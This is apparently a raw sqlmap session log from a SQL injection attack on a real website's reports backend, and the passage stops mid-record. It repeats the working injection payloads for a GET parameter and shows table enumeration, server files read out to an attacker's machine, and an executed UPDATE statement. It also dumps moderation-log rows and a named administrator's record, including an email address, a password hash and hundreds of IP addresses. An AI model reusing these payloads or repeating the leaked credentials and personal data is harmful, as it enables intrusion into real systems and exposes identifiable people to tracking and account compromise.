+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from actions_log limit 15 [3]:
[*] Mr VacBob, 3, , ggg, 5832, Anonymous, 1, 0, 129514, , 2006-03-27 01:56:29
[*] Mr VacBob, 3, , ggg, 5834, Anonymous, 0, 1, 129514, , 2006-03-27 01:56:58
[*] Seem, 3, Let's have a thread for "only good thing out , laura, 5835, Anonymous, 2, 0, 392868, Good things from crappy series, 2006-03-27 06:15:00
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from actions_log order by id desc limit 15 [2]:
[*] Aerolite, mlp, Why the fuck isn't thre a sticky? Is there no, image-1130022361.jpg, 31400, Anonymous, 2, 0, 17340318, , 2014-04-19 09:51:43
[*] Aerolite, mlp, None, Discord_lamp_S4E22.png, 31399, Anonymous, 1, 0, 17340412, Today's episode, 2014-04-19 09:45:55
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from actions_log where board='int' order by id desc limit 15 [7]:
[*] RapeApe, int, Your country
How much would you pay to torture an american without any risk to be found guilty?
Also, if you had the chance what nationality would you like to torture?
France
Up to €, le_funny_slovakian_hollydays.jpg, 31285, Anonymous, 2, 0, 22927873, , 2014-04-09 19:43:08
[*] ALTERNATIVE, int, Is it true that american english is worthless to learn?, british-english-vs-american-english.jpg, 31233, Anonymous, 2, 0, 22819261, , 2014-04-07 09:45:56
[*] RapeApe, int, <span class="quote">>Gender</span>
<span cla, Ana_rica_orange_top.jpg, 31109, Anonymous, 2, 0, 22606083, , 2014-04-02 08:47:05
[*] RapeApe, int, http://strawpoll.me/1231186, jessica-gomes_06.jpg, 30523, Anonymous, 2, 0, 21103223, poll tiem, 2014-02-28 10:45:27
[*] Cadfael, int, <span class="quote">>deleting threads</span>, fat greeks.jpg, 30394, Anonymous, 2, 0, 20708623, /brit/, 2014-02-18 21:07:41
[*] RapeApe, int, 1. you're country
2. are you gay?, 2M Fuck you.jpg, 30235, Anonymous, 2, 0, 20258502, , 2014-02-07 20:22:58
[*] RapeApe, int, Your country
Last time you brushed your teeth, dentist.jpg, 29160, Anonymous, 2, 0, 17525264, , 2013-11-30 08:30:51
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
SHOW VARIABLES WHERE Variable_Name = "datadir" [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
files saved to [1]:
[*] /Users/matthew/Desktop/sqlmapproject-sqlmap-f29769b/output/reports.4chan.org/files/_usr_www_4chan.org_web_reports_old.php
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
files saved to [1]:
[*] /Users/matthew/Desktop/sqlmapproject-sqlmap-f29769b/output/reports.4chan.org/files/_usr_www_4chan.org_web_reports_stats.php (size differs from remote file)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
Database: information_schema
[63 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| QUERY_CACHE_INFO |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
+---------------------------------------+
Database: backend
[34 tables]
+---------------------------------------+
| janitor_apps_backup_2-2014 |
| janitor_apps_backup_9-2012 |
| actions_log |
| ads_advertisers |
| ads_campaigns |
| ads_keywords |
| ads_products |
| appeals |
| ban_request_stats |
| ban_requests |
| ban_templates |
| banned_users |
| banned_users_backup |
| blacklist |
| blotter_messages |
| boardlist |
| del_log |
| domainlist |
| janitor_apps |
| keyword_log |
| mod_users |
| pass_users |
| pass_users_testing |
| post_filter |
| post_filter_categories |
| preserved_information |
| prof_times |
| reporter_stats |
| reports |
| reports_for_posts |
| suggestion_box |
| user_actions |
| users_sync |
| xff |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from user_actions limit 15 [2]:
[*] new_reply, 2014-04-12 12:01:33, , 16832536, 0, 1397318493149
[*] new_reply, 2014-04-12 12:01:33, , 16832536, 0, 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select * from mod_users where username='moot' [1]:
[*] admin, all, , moot@4chan.org, developer, 2, {"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.192.68.50":0,"207.237.196.229":0,"70.192.64.236":0,"70.192.86.154":0,"198.228.204.131":0,"70.192.86.57":0,"74.66.8.191":0,"70.192.99.42":0,"70.192.96.242":0,"198.228.207.211":0,"70.192.86.66":0,"198.228.207.150":0,"70.192.96.192":0,"70.192.74.1":0,"71.212.124.188":0,"70.199.133.11":0,"70.199.137.94":0,"70.199.137.114":0,"70.199.137.156":0,"70.199.128.76":0,"70.199.248.4":0,"70.199.224.195":0,"166.147.81.136":0,"70.199.130.200":0,"12.130.106.101":0,"198.228.207.19":0,"198.228.207.145":0,"198.228.204.85":0,"198.228.205.46":0,"198.228.205.143":0,"198.228.207.86":0,"70.192.68.176":0,"70.192.72.154":0,"70.192.64.80":0,"69.124.62.42":0,"70.192.74.115":0,"70.208.72.61":0,"70.208.80.72":0,"85.114.63.138":0,"76.15.59.112":0,"96.238.98.52":0,"70.208.65.116":0,"199.108.71.44":0,"67.139.178.66":0,"199.223.125.130":0,"199.106.166.130":0,"199.106.166.95":0,"199.106.166.10":0,"70.193.132.88":0,"70.193.128.160":0,"70.193.129.178":0,"70.193.136.155":0,"63.133.202.2":0,"70.193.128.219":0,"199.106.165.150":0,"70.208.66.77":0,"70.208.69.81":0,"70.208.64.178":0,"70.208.65.132":0,"70.208.84.252":0,"74.66.10.29":0,"208.105.84.100":0,"198.255.178.112":1397922202,"70.208.86.25":0,"70.208.77.209":0,"70.197.5.20":0,"70.197.5.53":0,"71.141.96.58":0,"70.197.4.200":0,"199.106.164.74":0,"70.208.75.54":0,"198.255.177.61":1393278939,"71.141.96.56":0,"117.55.65.136":0,"117.55.65.133":0,"117.55.65.134":0,"153.120.206.224":1396625609,"117.55.65.135":0,"49.240.26.214":0,"153.120.232.253":0,"70.208.76.201":0,"71.141.103.1":0,"209.118.237.69":0,"70.197.14.104":0,"70.197.0.52":0,"70.197.10.243":0,"70.197.3.113":0,"70.197.15.65":0,"70.197.5.47":0,"205.154.255.206":0,"199.106.164.80":0,"24.90.234.161":1392868758,"199.106.165.16":1393351969,"71.118.69.99":1393436027,"50.131.222.48":1395516029,"2600:1010:b020:6f57:656e:e597:1966:ec2f":1393748114,"70.197.4.102":1393748151,"70.197.12.52":1393787071,"2600:1010:b003:c7ac:2c45:25d:7157:cdfc":1393787087,"24.43.227.7":1394225684,"70.210.128.135":1394268733,"2600:100f:b10e:d3b4:7498:7a7:54b2:7e67":1394262217,"72.234.2.242":1394346178,"70.210.129.162":1394359543,"2600:100f:b11b:2f9e:341b:95ff:37ff:833":1394400970,"70.210.133.231":1394398934,"98.147.124.68":1394418703,"173.197.107.7":1394486191,"2600:100f:b128:db5a:41ac:a4ee:36ab:34e":1394505489,"2600:100f:b11d:1b77:809c:42b:7f4f:3b37":1394513983,"70.210.133.2":1394575048,"2600:100f:b12e:2b8:d1ec:4926:635d:339":1394522956,"70.210.132.44":1394585200,"64.129.1.15":1394656562,"64.129.1.11":1394913797,"70.210.134.50":1394927948,"50.67.162.78":1395387193,"2600:1001:b110:835e:a5c6:96d3:f0db:d8d9":1395621867,"219.166.9.153":1396485863,"111.189.249.53":1396552281,"111.189.248.80":1396625716,"111.189.185.89":1396663246,"111.189.249.126":1396701836,"111.189.184.191":1396713107,"111.189.248.87":1396778806,"111.189.184.206":1396806993,"111.189.249.179":1396841910,"111.189.185.67":1396860723,"111.189.184.218":1396893728,"111.189.184.61":1396931109,"111.189.249.174":1396959967,"70.208.77.101":1397071823,"2600:1001:b119:1a8e:905d:ebf6:3dee:76ed":1397071637,"198.228.207.195":1397583760,"198.228.204.169":1397864032,"98.14.45.231":1397864143,"124.181.137.61":1397921454,"121.219.238.59":1397924151}, 0, 2014-04-15 09:01:23, $2y$10$FB7uBnej86SqGsYfrHfM7ulcDk7XGYvM3MzbMFMIFRljbsH/ZMjpS, 0, moot
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select last_login from mod_users where username='moot': '2014-04-15 09:01:23'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
update users SET ips = substr(ips,-56);: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ip from mod_users where username='moot' [1]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: days
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: days=1 AND 4399=4399
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: days=1 AND (SELECT 4873 FROM(SELECT COUNT(*),CONCAT(0x71726c6571,(SELECT (CASE WHEN (4873=4873) THEN 1 ELSE 0 END)),0x71726c6971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: days=1 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0
select ips from mod_users where username='moot': '{"68.198.92.159":0,"68.198.104.14":0,"76.123.57.50":0,"10.0.0.100":0,"87.254.149.253":0,"72.229.100.100":0,"207.126.64.169":0,"92.225.48.142":0,"69.86.149.163":0,"68.236.163.150":0,"129.44.57.254":0,"69.86.243.82":0,"66.173.155.228":0,"75.217.213.126":0,"98.154.254.67":0,"75.222.189.166":0,"124.217.180.47":0,"96.32.188.208":0,"76.122.97.117":0,"75.213.134.125":0,"75.228.145.73":0,"24.4.137.169":0,"71.141.126.249":0,"75.238.77.16":0,"75.193.212.250":0,"69.86.243.102":0,"75.238.1.141":0,"75.238.2.57":0,"75.239.225.70":0,"75.193.6.108":0,"75.238.110.85":0,"75.235.175.28":0,"75.234.5.152":0,"75.193.166.248":0,"75.236.159.213":0,"75.192.225.153":0,"75.193.224.168":0,"75.199.224.157":0,"75.193.174.193":0,"69.60.16.130":0,"66.92.0.109":0,"206.169.179.202":0,"99.8.185.86":0,"69.97.212.254":0,"75.198.241.130":0,"64.206.151.220":0,"98.210.10.58":0,"75.212.95.42":0,"173.56.80.80":0,"208.90.214.59":0,"69.86.148.42":0,"75.200.26.200":0,"69.86.148.190":0,"72.229.100.161":0,"74.110.179.242":0,"166.248.62.213":0,"69.86.243.13":0,"166.248.1.133":0,"166.248.0.68":0,"166.248.0.24":0,"166.248.0.186":0,"69.86.148.49":0,"219.118.120.8":0,"221.243.26.164":0,"98.210.16.87":0,"50.74.4.178":0,"69.86.148.14":0,"69.86.243.215":0,"67.250.2.243":0,"67.247.29.46":0,"72.43.166.86":0,"208.72.142.22":0,"62.50.198.117":0,"173.245.52.148":0,"98.92.19.86":0,"66.154.114.131":0,"75.37.27.159":0,"208.105.85.202":0,"71.56.181.126":0,"166.248.0.45":0,"208.105.85.213":0,"166.248.18.239":0,"199.106.164.67":0,"166.250.64.50":0,"166.250.71.62":0,"199.106.164.81":0,"208.105.86.3":0,"77.108.161.2":0,"166.248.6.82":0,"70.192.129.3":0,"166.248.1.140":0,"98.117.95.116":0,"173.67.243.126":0,"70.195.192.255":0,"70.195.192.177":0,"70.195.193.29":0,"70.195.192.170":0,"199.106.166.38":0,"70.192.67.24":0,"78.250.183.45":0,"92.226.32.8":0,"92.225.85.52":0,"37.14.171.58":0,"37.14.165.35":0,"79.157.233.162":0,"70.199.129.37":0,"70.199.130.89":0,"70.199.128.176":0,"70.199.130.35":0,"70.199.132.13":0,"166.137.86.235":0,"199.106.164.69":0,"70.197.2.94":0,"70.197.1.138":0,"70.197.0.171":0,"70.197.6.193":0,"71.202.19.140":1393747152,"199.188.194.152":0,"70.197.5.255":0,"199.106.164.77":0,"78.24.18.2":0,"70.197.145.30":0,"66.63.164.214":0,"205.214.226.18":0,"199.188.194.149":0,"69.181.70.170":1393806830,"208.105.86.32":0,"199.106.165.60":0,"98.173.88.102":0,"199.106.165.104":0,"70.192.68.171":0,"199.106.164.82":0,"123.224.230.25":0,"111.191.218.214":0,"113.39.75.70":0,"1.114.221.40":0,"1.114.240.119":0,"203.141.139.162":0,"72.89.40.62":0,"204.152.204.156":0,"204.152.204.165":0,"108.182.31.184":0,"216.214.189.162":0,"216.4.227.71":0,"70.197.68.90":0,"208.115.81.243":0,"70.197.65.64":0,"70.197.65.104":0,"70.199.77.80":0,"70.199.80.225":0,"70.199.83.110":0,"70.199.88.61":0,"70.199.85.170":0,"173.245.57.22":0,"199.106.164.73":0,"70.192.68.129":0,"70.192.86.67":0,"70.196.65.112":0,"70.196.64.92":0,"70.196.66.140":0,"70.196.66.242":0,"96.238.184.54":0,"76.104.11.43":0,"24.44.231.99":0,"160.39.171.85":0,"70.192.76.61":0,"70.192.92.159":0,"66.216.9.130":0,"70.192.75.25":0,"70.192.97.128":0,"70.192.73.188":0,"198.228.194.64":0,"166.147.110.136":0,"166.147.109.87":0,"114.164.237.233":0,"222.151.98.81":0,"166.147.109.232":0,"36.245.210.248":0,"166.147.110.78":0,"101.128.197.51":0,"166.147.111.120":0,"166.147.109.106":0,"166.147.111.131":0,"166.147.110.237":0,"183.177.175.203":0,"123.230.73.94":0,"166.147.110.132":0,"70.192.83.220":0,"66.108.63.147":0,"198.228.205.2":0,"198.228.207.58":0,"198.228.204.24":0,"198.228.207.121":0,"198.228.204.18":0,"198.228.207.59":0,"198.228.204.63":0,"166.147.110.105":0,"166.147.111.105":0,"82.69.8.53":0,"166.147.108.56":0,"166.147.108.90":0,"91.85.229.107":0,"166.147.108.161":0,"217.41.228.62":0,"198.228.205.42":0,"10.0.0.19":1397794249,"198.228.192.65":0,"70.192.72.85":0,"70.192.65.112":0,"70.192.64.22":0,"70.